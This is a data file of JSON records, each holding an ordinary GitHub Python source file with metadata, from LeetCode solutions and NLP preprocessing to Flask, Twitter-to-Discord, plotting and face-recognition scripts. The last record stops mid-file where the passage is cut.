+{"seq_id":"4586941478","text":"#205. Isomorphic Strings\nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n s_to_t = {}\n t_to_s = {}\n\n for i in range(len(s)):\n \n if s[i] not in s_to_t:\n s_to_t[s[i]] = []\n \n if t[i] not in t_to_s:\n t_to_s[t[i]] = []\n\n if t[i] not in s_to_t[s[i]]:\n s_to_t[s[i]].append(t[i])\n\n if s[i] not in t_to_s[t[i]]:\n t_to_s[t[i]].append(s[i])\n \n if len(t_to_s[t[i]]) > 1 or len(s_to_t[s[i]]) > 1:\n return False \n \n if t_to_s[s_to_t[s[i]][0]][0] != s[i]:\n return False\n\n \n\n \n return True\n","repo_name":"SpinachXPasta/Leetcode","sub_path":"isIsomorphic.py","file_name":"isIsomorphic.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5762353213","text":"from __future__ import print_function\nimport sys\nimport argparse\nimport os.path\nfrom check_file import check_file\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--vcf-file', required=True, help='')\n parser.add_argument('-o', '--output-file', nargs='?', help='')\n parser.add_argument('-s', '--stdout', action='store_true', help='')\n args = parser.parse_args()\n\n check_file(args.vcf_file)\n\n if not args.stdout and not args.output_file:\n args.output_file = args.vcf_file + '.noh'\n\n return(args.vcf_file, args.output_file)\n\n\ndef remove_header(input_file, output_file=None):\n if not output_file:\n of = sys.stdout\n else:\n of = open(output_file, 'w')\n\n with open(input_file, 'r') as f:\n for line in f:\n if not line.startswith('##'):\n print(line, file=of, end='')\n\n\ndef main():\n input_file, output_file = get_args()\n remove_header(input_file, output_file)\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewquitadamo/matrix_eqtl_pipeline","sub_path":"code/remove_vcf_header.py","file_name":"remove_vcf_header.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"39775377545","text":"from flask import Flask, render_template, redirect, flash\nfrom flask.globals import request\nfrom flask_debugtoolbar import DebugToolbarExtension\n\nfrom Surveys import Question as Q, Survey as S, satisfaction_survey as ss, personality_quiz as pq, surveys\nfrom QuestionForm import QuestionForm as QF\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"himitsu-desu\"\n\ndebug = DebugToolbarExtension(app)\n\n\nresponses = []\n\n\n@app.route('/')\ndef start_survey():\n \"\"\"Return start survey page.\"\"\"\n \n title = ss.title\n instructions = ss.instructions\n \n return render_template(\"start.html\", instructions = instructions, title = title)\n\n\n@app.route('/question/')\ndef question(id):\n \"\"\"Return question page.\"\"\"\n form = QF()\n\n current_id = len(responses)\n \n if id == current_id:\n title = ss.title\n question = ss.questions[current_id].question\n choices = ss.questions[current_id].choices\n instructions = ss.instructions\n return render_template(\"question.html\", question = question, title = title, id = current_id, form = form, instructions = instructions, choices = choices)\n elif id > len(ss.questions) and len(responses) >= len(ss.questions):\n return redirect('/thanks')\n else: \n flash(\"Invalid question, try again!\", 'warn')\n return redirect(f'/question/{current_id}')\n\n\n@app.route('/answer', methods=['POST'])\ndef handle_answer():\n \"\"\"Handle answer from form submission and redirect.\"\"\"\n \n answer = request.form['choices']\n responses.append(answer)\n current_id = len(responses)\n \n if len(responses) < len(ss.questions):\n return redirect(f'/question/{current_id}')\n else:\n return redirect('/thanks')\n \n \n@app.route('/thanks')\ndef thanks():\n \"\"\"Return thank you page.\"\"\"\n \n return render_template(\"thanks.html\")","repo_name":"Katsurio/FlaskSurvey","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1327121465","text":"import re\nimport pandas as pd\nimport nltk\nnltk.download('brown')\nnltk.download('names')\nnltk.download('universal_tagset')\nnltk.download('average_perceptron_tagger')\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom nltk.tokenize import word_tokenize, regexp_tokenize\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom nltk.corpus import stopwords\nfrom textblob import TextBlob\nimport string\nfrom collections import Counter\nfrom normalise import normalise\n\nfrom sklearn.base import TransformerMixin, BaseEstimator\n\nclass TextSlack(BaseEstimator, TransformerMixin):\n def __init__(self, variety='BrE', user_abbrevs={}, lang='english'):\n try:\n self.variety = variety\n self.user_abbrevs = user_abbrevs\n self.lang = lang\n if self.lang in stopwords.fileids() and self.lang in SnowballStemmer.languages:\n self.stop_words = stopwords.words(lang)\n else:\n raise LanguageNotFoundException('{} is currently not supported by textslack.'.format(self.lang), 'Keep checking for support in the future updates.')\n self.lemmatizer = WordNetLemmatizer()\n self.stemmer = SnowballStemmer(lang, ignore_stopwords=True)\n \n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def fit(self, X, y=None):\n return self\n\n def transform(self, X, *_):\n if isinstance(X, pd.Series):\n return X.apply(self._preprocess_text)\n elif isinstance(X, list):\n return [self._preprocess_text(x) for x in X]\n else:\n return self._preprocess_text(X)\n\n def _preprocess_text(self, text):\n if self.lang == 'english':\n normalised_text = self._normalise(text)\n normalised_text = re.sub(' +', ' ', normalised_text)\n words = regexp_tokenize(normalised_text.lower(), r'[A-Za-z]+')\n removed_punct = self._remove_punct(words)\n removed_stopwords = self._remove_stopwords(removed_punct)\n return self._lemmatize(removed_stopwords)\n else:\n words = word_tokenize(text.lower())\n removed_punct = self._remove_punct(words)\n removed_stopwords = self._remove_stopwords(removed_punct)\n return ' '.join([w for w in removed_stopwords])\n\n def _normalise(self, text):\n try:\n return ' '.join(normalise(word_tokenize(text), variety=self.variety, user_abbrevs=self.user_abbrevs, verbose=False))\n except:\n return text\n\n def _remove_punct(self, words):\n return [w for w in words if w not in string.punctuation]\n\n def _remove_stopwords(self, words):\n return [w for w in words if w not in self.stop_words and len(w)>1]\n\n def _lemmatize(self, words):\n return ' '.join([self.lemmatizer.lemmatize(w, pos='v') for w in words])\n \n def _stem(self, words):\n return ' '.join([self.stemmer.stem(w) for w in words])\n \n def extract_nouns(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'NN'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def extract_verbs(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'VB'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def extract_adjectives(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'JJ'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def extract_adverbs(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'RB'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def sentiment(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n _, polarity = self._blob_features(processed_text)\n return 'pos' if polarity > 0.0 else 'neg' if polarity < 0.0 else 'neu'\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n\n def _blob_features(self, text):\n blob = TextBlob(text)\n return blob.tags, blob.polarity\n \n def word_occurances(self, word, text):\n word_count_dic = dict(Counter([w for w in word_tokenize(text)]))\n return [c for w, c in word_count_dic.items() if w==word][0]\n \nclass LanguageNotFoundException(Exception):\n def __init__(self, message, details=None):\n self.message = message\n self.details = details\n def __str__(self):\n return str(self.message)","repo_name":"AnkitRajSri/textslack","sub_path":"textslack/textslack.py","file_name":"textslack.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"15362250181","text":"\"\"\"Add ticket_issued payment flag\n\nRevision ID: 17032733727a\nRevises: 3c6cca2d97e3\nCreate Date: 2019-11-05 16:07:14.444915\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '17032733727a'\ndown_revision = '3c6cca2d97e3'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('purchase', sa.Column('ticket_issued', sa.Boolean(), nullable=False, server_default='false'))\n op.add_column('purchase_version', sa.Column('ticket_issued', sa.Boolean(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('purchase_version', 'ticket_issued')\n op.drop_column('purchase', 'ticket_issued')\n # ### end Alembic commands ###\n","repo_name":"emfcamp/Website","sub_path":"migrations/versions/17032733727a_add_ticket_issued_purchase_flag.py","file_name":"17032733727a_add_ticket_issued_purchase_flag.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"71"}
+{"seq_id":"12108466707","text":"\"\"\"Pig Latin, by Al Sweigart al@inventwithpython.com\nTranslates English messages into Igpay Atinlay.\nView this code at https://nostarch.com/big-book-small-python-projects\nTags: short, word\"\"\"\n\ntry:\n import pyperclip\nexcept ImportError:\n pass\n\nVOWELS = ('a', 'e', 'i', 'o', 'u', 'y')\n\ndef main():\n print('Enter your message:')\n pigLatin = englishToPigLatin(input('> '))\n\n print(pigLatin)\n\ndef englishToPigLatin(message):\n pigLatin = ''\n for word in message.split():\n prefixNonLetters = ''\n while len(word) > 0 and not word[0].isalpha():\n prefixNonLetters += word[0]\n word = word[1:]\n \n if len(word) == 0:\n pigLatin = pigLatin + prefixNonLetters + ' '\n continue\n\n suffixNonLetters = ''\n while not word[-1].isalpha():\n suffixNonLetters = word[-1] + suffixNonLetters\n word = word[:-1]\n \n wasUpper = word.isupper()\n wasTitle = word.istitle()\n\n word = word.lower()\n\n prefixConsonants = ''\n while len(word) > 0 and not word[0] in VOWELS:\n prefixConsonants += word[0]\n word = word[1:]\n \n if prefixConsonants != '':\n word += prefixConsonants + 'ay'\n else:\n word += 'yay'\n \n if wasUpper:\n word = word.upper()\n if wasTitle:\n word = word.title()\n \n pigLatin += prefixNonLetters + word + suffixNonLetters + ' '\n return pigLatin\n\nif __name__ == '__main__':\n main()","repo_name":"therealskv/python-small-projects","sub_path":"piglatin.py","file_name":"piglatin.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26968876662","text":"import argparse\nimport functools\nimport operator\nimport pathlib\nfrom typing import Dict\n\nimport pandas as pd\nfrom bokeh.plotting import save\nfrom robotoff.taxonomy import Taxonomy\nfrom robotoff.utils import gzip_jsonl_iter\nfrom tensorflow import keras\n\nimport settings\nfrom category_classification.data_utils import generate_data_from_df\nfrom utils.error_analysis import (\n generate_analysis_model,\n get_deepest_categories,\n get_error_category,\n get_interactive_embedding_plot,\n)\nfrom utils.io import (\n load_category_vocabulary,\n load_config,\n load_ingredient_vocabulary,\n load_product_name_vocabulary,\n)\nfrom utils.metrics import evaluation_report\nfrom utils.preprocess import get_nlp\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"model_path\",\n type=pathlib.Path,\n default=pathlib.Path(__file__).parent / \"weights/0/saved_model\",\n )\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n model_dir = args.model_path.parent\n\n config = load_config(model_dir)\n\n category_to_id = load_category_vocabulary(model_dir)\n ingredient_to_id = load_ingredient_vocabulary(model_dir)\n category_names = [\n category\n for category, _ in sorted(category_to_id.items(), key=operator.itemgetter(1))\n ]\n\n nlp = get_nlp(config.lang)\n\n product_name_vocabulary = load_product_name_vocabulary(model_dir)\n model = keras.models.load_model(str(args.model_path))\n\n generate_data_partial = functools.partial(\n generate_data_from_df,\n ingredient_to_id=ingredient_to_id,\n category_to_id=category_to_id,\n product_name_max_length=config.model_config.product_name_max_length,\n product_name_token_to_int=product_name_vocabulary,\n nlp=nlp,\n product_name_preprocessing_config=config.product_name_preprocessing_config,\n nutriment_input=config.model_config.nutriment_input,\n )\n\n val_df = pd.DataFrame(gzip_jsonl_iter(settings.CATEGORY_XX_TEST_PATH))\n\n category_taxonomy: Taxonomy = Taxonomy.from_json(settings.CATEGORY_TAXONOMY_PATH)\n\n X_val, y_val = generate_data_partial(val_df)\n\n y_pred_val = model.predict(X_val)\n\n predicted = [\n [{category_names[i]: conf} for i, conf in sorted(enumerate(y)) if conf >= 0.5]\n for y in y_pred_val\n ]\n\n val_df[\"predicted categories\"] = [\n [p for p in preds if next(iter(p)) in categories]\n for preds, categories in zip(predicted, val_df.categories_tags)\n ]\n\n val_df[\"wrong prediction\"] = [\n [p for p in preds if next(iter(p)) not in categories]\n for preds, categories in zip(predicted, val_df.categories_tags)\n ]\n\n val_df[\"missed prediction\"] = [\n [\n category\n for category in categories\n if category not in [next(iter(d)) for d in preds]\n ]\n for preds, categories in zip(predicted, val_df.categories_tags)\n ]\n\n val_df = val_df[\n (val_df[\"wrong prediction\"].map(len) > 0)\n | (val_df[\"missed prediction\"].map(len) > 0)\n ]\n\n val_df.drop(\n [\n \"nutriments\",\n \"images\",\n \"product_name\",\n \"lang\",\n \"categories_tags\",\n \"ingredient_tags\",\n \"ingredients_text\",\n \"known_ingredient_tags\",\n ],\n axis=1,\n inplace=True,\n )\n\n val_df.rename(columns={\"code\": \"barcode\"}, inplace=True)\n\n pd.set_option(\"display.max_columns\", None)\n pd.set_option(\"display.max_rows\", None)\n pd.set_option(\"display.width\", None)\n pd.set_option(\"display.max_colwidth\", None)\n\n val_df.head(n=100).to_csv(\"misprediction_sample.csv\")\n\n #\n # report_val, clf_report_val = evaluation_report(y_val, y_pred_val,\n # taxonomy=category_taxonomy,\n # category_names=category_names)\n #\n #\n # def low_perf_categories_gen(clf_report: Dict,\n # min_support: int,\n # max_f1_score: float):\n # for category, metrics in clf_report.items():\n # f1_score = metrics['f1-score']\n # support = metrics['support']\n #\n # if support >= min_support:\n # if f1_score < max_f1_score:\n # yield category\n #\n # # train_df = pd.DataFrame(gzip_jsonl_iter(settings.CATEGORY_FR_TRAIN_PATH))\n # # train_df['deepest_categories'] = get_deepest_categories(category_taxonomy, train_df.categories_tags)\n # # X_train, y_train = generate_data_partial(train_df)\n #\n #\n # gen = low_perf_categories_gen(clf_report_val, min_support=10, max_f1_score=0.5)\n # cat = next(gen)\n # val_metrics = clf_report_val[cat]\n # cat_id = category_to_id[cat]\n # # train_samples_idx = y_train[:, cat_id].nonzero()[0]\n # val_samples_idx = y_val[:, cat_id].nonzero()[0]\n # # train_samples = train_df.iloc[train_samples_idx, :]\n # val_samples = val_df.iloc[val_samples_idx, :]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"openfoodfacts/off-category-classification","sub_path":"attic/category_classification/sample_generator.py","file_name":"sample_generator.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"}
+{"seq_id":"20717680","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pds\nfrom util.prefix import all\n\ndef main():\n\n df = pds.read_csv('word/properties/medicine.csv')\n\n pro = open('data/ontology/pro.ttl', 'w')\n pro.write(all())\n\n pro.write('\\n\\n\\n')\n\n for index, row in df.iterrows():\n pro.write('prom:P%d rdfs:label \"%s\"@cn .\\n' % (index, row['name']))\n\n pro.close()\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"hetaov/spider","sub_path":"ontology/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9242484216","text":"import tweepy, discord, time, requests \nfrom discord import Webhook, RequestsWebhookAdapter\n\n#auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth=tweepy.OAuthHandler(\"\", \"\");\n#auth.set_access_token(access_token, access_token_secret)\nauth.set_access_token(\"\", \"\");\napi = tweepy.API(auth);\n#get the discord webhook URL from creating a webhook in the prefered channel in your discord server\ndiscordWebhookURL = \"\";\n\n#Create a StreamListener.\nclass MyStreamListener(tweepy.StreamListener):\n def __init__(self, api):\n self.api = api;\n self.me = api.me();\n def process_data(self, status):\n print(status.text);\n def on_status(self, tweet):\n photos = []\n #Handle media.\n if 'media' in tweet.entities:\n for image in tweet.entities['media']:\n photos.append(image['media_url']);\n print(\"adding image to photos\");\n #Create webhook on discord server and include URL here.\n webhook = Webhook.from_url(discordWebhookURL, adapter=RequestsWebhookAdapter());\n print(len(photos))\n if len(photos) < 1:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text}\");\n if len(photos) == 1:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]}\");\n if len(photos) == 2:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]} {photos[1]}\");\n if len(photos) == 3:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]} {photos[1]} {photos[2]}\");\n if len(photos) == 4:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]} {photos[1]} {photos[2]} {photos[3]}\");\n def on_exception(self, exception):\n time.sleep(60);\n print('Took a minute break.');\n #Re-establish stream params in order to check if the stream is not running\n api = tweepy.API(auth);\n myStreamListener = MyStreamListener(api);\n stream = tweepy.Stream(api.auth, myStreamListener);\n if not stream.running:\n main();\n else:\n print('Failed to continue.');\ndef main():\n #Create a Stream\n api = tweepy.API(auth);\n myStreamListener = MyStreamListener(api);\n stream = tweepy.Stream(api.auth, myStreamListener);\n #Update this list of Twitter Ids (string) to follow. \n #Can find Twitter Id at https://codeofaninja.com/tools/find-twitter-id/\n stream.filter(follow=['']);\n#Continuously look out for Twitter events\nif __name__ == \"__main__\":\n while True:\n main()","repo_name":"TinyArcade/python-to-discordwebhooks","sub_path":"TweetToDiscord.py","file_name":"TweetToDiscord.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"32919062508","text":"import metview as mv\n\n# Note: at least Metview version 5.16.0 is required\n\n# getting data\nuse_mars = False\n\nfilename = \"vert_hovm_ml_tq.grib\"\nsteps = list(range(0, 132, 12))\n\n# getting forecast data from MARS\nif use_mars:\n ret_core = {\n \"date\": 20171016,\n \"time\": 0,\n \"levtype\": \"ml\",\n \"grid\": [1, 1],\n \"area\": [45, -10, 55, 5],\n }\n\n tq = mv.retrieve(\n type=\"fc\",\n param=[\"t\", \"q\"],\n step=steps,\n levelist=list(range(80, 138)),\n **ret_core\n )\n lnsp = mv.retrieve(type=\"fc\", param=\"lnsp\", step=steps, levelist=1, **ret_core)\n zs = mv.retrieve(type=\"an\", param=\"z\", levelist=1, **ret_core)\n g = mv.merge(tq, lnsp, zs)\n# read data from file\nelse:\n if mv.exist(filename):\n g = mv.read(filename)\n else:\n g = mv.gallery.load_dataset(filename)\n\n# extract surface geopotential\nzs = g.select(shortName=\"z\")\n\n# compute geopotential on model levels\nz = mv.Fieldset()\nfor step in steps:\n t = g.select(shortName=\"t\", step=step)\n q = g.select(shortName=\"q\", step=step)\n lnsp = g.select(shortName=\"lnsp\", step=step)\n z.append(mv.mvl_geopotential_on_ml(t, q, lnsp, zs))\n\n# scale geopotential to height above sea level\nz = z / 9.81\n\n# scale temperature from K to C\nt = g.select(shortName=\"t\") - 273.16\n\n# create input fieldset for vertical Hovmoeller\ng_hov = mv.merge(t, z)\n\n# define time axis\ntime_axis = mv.maxis(\n axis_type=\"date\",\n axis_tick_label_height=0.4,\n axis_date_type=\"hours\",\n axis_days_label_height=0.4,\n)\n\n# define vertical axis\nvertical_axis = mv.maxis(\n axis_type=\"position_list\",\n axis_tick_position_list=list(range(0, 4500, 500)),\n axis_tick_label_height=0.4,\n axis_title_text=\"Height ASL (m)\",\n axis_title_height=0.5,\n)\n\n# define vertical Hovmoeller with height above sea level axis for model level\n# data for a given location (at least Metview version 5.16.0 is required)\nhov = mv.mhovmoellerview(\n type=\"vertical_hovm\",\n input_mode=\"nearest_gridpoint\",\n point=[48, 2],\n vertical_level_type=\"user\",\n top_level=4000,\n bottom_level=0,\n vertical_coordinate_param=129,\n vertical_coordinate_extrapolate=\"off\",\n time_axis=time_axis,\n vertical_axis=vertical_axis,\n)\n\n# define contour shading\nt_shade = mv.mcont(\n contour_automatic_setting=\"style_name\",\n contour_style_name=\"sh_all_fM50t58i2\",\n legend=\"on\",\n)\n\n# define legend\nlegend = mv.mlegend(legend_text_font_size=0.3, legend_text_colour=\"charcoal\")\n\n# define the output plot file\nmv.setoutput(mv.pdf_output(output_name=\"vert_hovm_ml_in_height\"))\n\n# generate plot\nmv.plot(hov, g_hov, t_shade, legend)\n","repo_name":"ecmwf/metview-docs","sub_path":"docs/gallery/vert_hovm_ml_in_height.py","file_name":"vert_hovm_ml_in_height.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"}
+{"seq_id":"34193952947","text":"import numpy as np\nimport scipy.io\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom scipy import spatial\nfrom sklearn.preprocessing import normalize\nfrom sklearn.cluster import k_means\n\nfrom ex1a import count_non_zero\nfrom in_out import display_eigenvectors, save_values\n\n\nINPUT_PATH = 'data/face.mat'\nTRAINING_SPLIT_PERCENT = 0.7\nTRAINING_SPLIT = int(TRAINING_SPLIT_PERCENT*10)\nNUMBER_PEOPLE = 52\nM_PCA_reduction = 0 # Negative value\nM_LDA_reduction = 0 # Negative value\n\n# Leave those alone, access only\nM_PCA = 0\nM_LDA = 0\nSB_RANK = 0\nSW_RANK = 0\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n # print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n # print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n\n plt.yticks(tick_marks, classes)\n plt.xticks(tick_marks[0::5], classes[0::5], rotation=0)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n # for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n # plt.text(j, i, format(cm[i, j], fmt),\n # horizontalalignment=\"center\",\n # color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n plt.show()\n\ndef import_processing(data, class_means=False):\n\n faces = loadmat(data)\n # faces dimension is 2576, 520 -> each image is column vector of pixels(46, 56)\n X = np.reshape(faces['X'], (46*56, 52, 10)) # separate arrays for each person\n X = split_data(X)\n means = np.mean(X[0], axis=1, keepdims=True)\n # data = [(x - means[0][..., None]) for i, x in enumerate(X)]\n return X, means\n\n\ndef split_data(x):\n random_indexes = np.arange(0, 10)\n np.random.shuffle(random_indexes)\n\n training_data = np.reshape(x[..., random_indexes[0:TRAINING_SPLIT]], (46*56, -1))\n test_data = np.reshape(x[..., random_indexes[TRAINING_SPLIT:]], (46*56, -1))\n\n data = [training_data, test_data]\n return data\n\ndef compute_S(data, low_res=False):\n\n N = data.shape[1]\n if low_res:\n data = data.transpose()\n S = np.matmul(data, data.transpose()) / N # Normalises by N\n\n return S\n\ndef find_eigenvectors(S, how_many=-1):\n\n if how_many is -1:\n how_many = S.shape[0]\n\n eigvalues, eigvectors = np.linalg.eig(S)\n indices = np.flip(np.argsort(eigvalues), axis=0) # Gives original indices after sorting\n sorted_eigvalues = eigvalues[indices]\n sorted_eigvectors = eigvectors[:, indices]\n\n return sorted_eigvalues[0:how_many], sorted_eigvectors[:, 0:how_many]\n\ndef retrieve_low_eigvecs(low_eigvecs, data): # Returns normalized eigenvectors\n\n vecs = np.matmul(data, low_eigvecs)\n vecs /= np.linalg.norm(vecs, axis=0)[None, :]\n return vecs\n\n\ndef find_projection(eigenvectors, faces): # eigenvectors and faces in vector form\n\n coeffs = np.matmul(faces.transpose(), eigenvectors).transpose()\n # number_of_eigenvectors X Faces\n return coeffs\n\n\ndef reduce_by_PCA(training_data, means):\n global M_PCA\n\n training_data_norm = training_data - means\n low_S = compute_S(training_data_norm, low_res=True)\n eig_val, eig_vec = find_eigenvectors(low_S, how_many=-1)\n eig_vec = retrieve_low_eigvecs(eig_vec, training_data_norm)\n M_PCA = training_data_norm.shape[1]-NUMBER_PEOPLE + M_PCA_reduction # hyperparameter Mpca <= N-c\n eig_vec_reduced = eig_vec[:, :M_PCA]\n return eig_vec_reduced\n\n\ndef compute_class_means(training_data):\n\n class_means = np.mean(training_data.reshape(-1, NUMBER_PEOPLE, TRAINING_SPLIT), axis=2) # Shape is 2576*52 -> D*c\n return class_means\n\n\ndef compute_class_scatters(training_data, class_means):\n\n class_means_expand = np.repeat(class_means, TRAINING_SPLIT, axis=1)\n class_means_expand = class_means_expand.reshape(-1, NUMBER_PEOPLE, TRAINING_SPLIT).transpose(1, 0, 2)\n training_data_resh = training_data.reshape(-1, NUMBER_PEOPLE, TRAINING_SPLIT).transpose(1, 0, 2)\n class_scatters = np.matmul(training_data_resh - class_means_expand, (training_data_resh - class_means_expand).transpose(0, 2, 1))\n # Might have to for loop but I think it works\n return class_scatters\n\ndef compute_Sb(class_means):\n\n global_mean = np.mean(class_means, axis=1, keepdims=True)\n global_mean = np.repeat(global_mean, NUMBER_PEOPLE, axis=1)\n Sb = np.matmul(class_means - global_mean, (class_means - global_mean).transpose())\n return Sb\n\ndef compute_Sw(class_scatters):\n\n Sw = np.sum(class_scatters, axis=0)\n return Sw\n\n\ndef compute_LDA_Fisherfaces(Sw, Sb, Wpca, faces):\n global M_LDA\n\n # Maybe remove mean from faces\n Sw_PCA = np.matmul(np.matmul(Wpca.transpose(), Sw), Wpca)\n Sb_PCA = np.matmul(np.matmul(Wpca.transpose(), Sb), Wpca)\n S = np.matmul(np.linalg.inv(Sw_PCA), Sb_PCA)\n eig_vals, fisherfaces = find_eigenvectors(S, how_many=-1)\n M_LDA = count_non_zero(eig_vals) + M_LDA_reduction # hyperparameter Mlda <= c-1 -> there should be 51 non_zero eiganvalues\n # print(M_LDA) # Mlda = c - 1 = 51\n fisherfaces_reduced = fisherfaces[:, :M_LDA]\n faces_PCA = find_projection(Wpca, faces)\n fisher_ref_coeffs = find_projection(fisherfaces_reduced, faces_PCA)\n return fisher_ref_coeffs, fisherfaces_reduced\n\n\ndef goto_original_domain(fisherfaces, Wpca):\n\n fisher_images = np.matmul(Wpca, fisherfaces)\n return fisher_images\n\n\ndef find_fisher_coeffs(candidate_images, Wpca, fisherfaces):\n\n PCA_images = find_projection(Wpca, candidate_images)\n LDA_coeffs = find_projection(fisherfaces, PCA_images) # 51 vector\n\n return LDA_coeffs\n\n\ndef classify(LDA_coeffs_training, LDA_coeffs_test):\n\n distances = []\n for i in range(LDA_coeffs_test.shape[1]):\n distances.append(np.linalg.norm(LDA_coeffs_training - LDA_coeffs_test[:, i][:, None], axis=0))\n\n return np.floor(np.argmin(np.array(distances), axis=1)/TRAINING_SPLIT).astype(np.uint16)\n\n\ndef create_ground_truth():\n\n true_individual_index = np.arange(0, NUMBER_PEOPLE)\n true_individual_index = np.repeat(true_individual_index[:, None], 10-TRAINING_SPLIT, axis=1).reshape(-1)\n return true_individual_index\n\n\ndef bool_and_accuracy(ground_truth, prediction):\n\n correct = ground_truth == prediction\n accuracy = (correct[correct].shape[0]) / (ground_truth.shape[0])\n return correct, accuracy\n\n\ndef identify_failure(bool_a, number=-1):\n\n indices = np.argwhere(~bool_a)[:, 0] # Gives original indices after sorting\n\n return indices[:number]\n\n\ndef identify_success(bool_a, number=-1):\n\n indices = np.argwhere(bool_a)[:, 0] # Gives original indices after sorting\n\n return indices[:number]\n\n\nif __name__ == '__main__':\n\n M_PCAs = []\n accuracies = []\n DISPLAY = True\n # while M_PCA_reduction > -312:\n\n [training_data, testing_data], means = import_processing(INPUT_PATH)\n Wpca = reduce_by_PCA(training_data, means)\n class_means = compute_class_means(training_data)\n class_scatters = compute_class_scatters(training_data, class_means)\n Sb = compute_Sb(class_means)\n SB_RANK = np.linalg.matrix_rank(Sb) # Rank is c - 1 -> 51\n # print(SB_RANK)\n Sw = compute_Sw(class_scatters)\n SW_RANK = np.linalg.matrix_rank(Sw) # Rank is N - c -> 